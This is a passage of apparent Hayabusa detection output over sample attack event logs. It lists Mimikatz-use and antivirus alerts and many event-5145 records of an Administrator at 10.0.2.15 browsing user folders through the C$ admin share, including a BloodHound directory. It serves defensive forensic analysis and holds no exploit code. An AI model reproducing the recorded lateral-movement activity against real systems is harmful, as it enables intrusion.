10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network 
Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music\Sample Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music\Sample Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures\Sample Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: 
\\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures\Sample Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos\Sample Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos\Sample Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded TV : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded 
TV\Sample Media\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded TV\Sample Media : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Downloads\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Videos\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Links : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Links\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Documents : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Pictures : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Music\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Contacts : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\locales : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 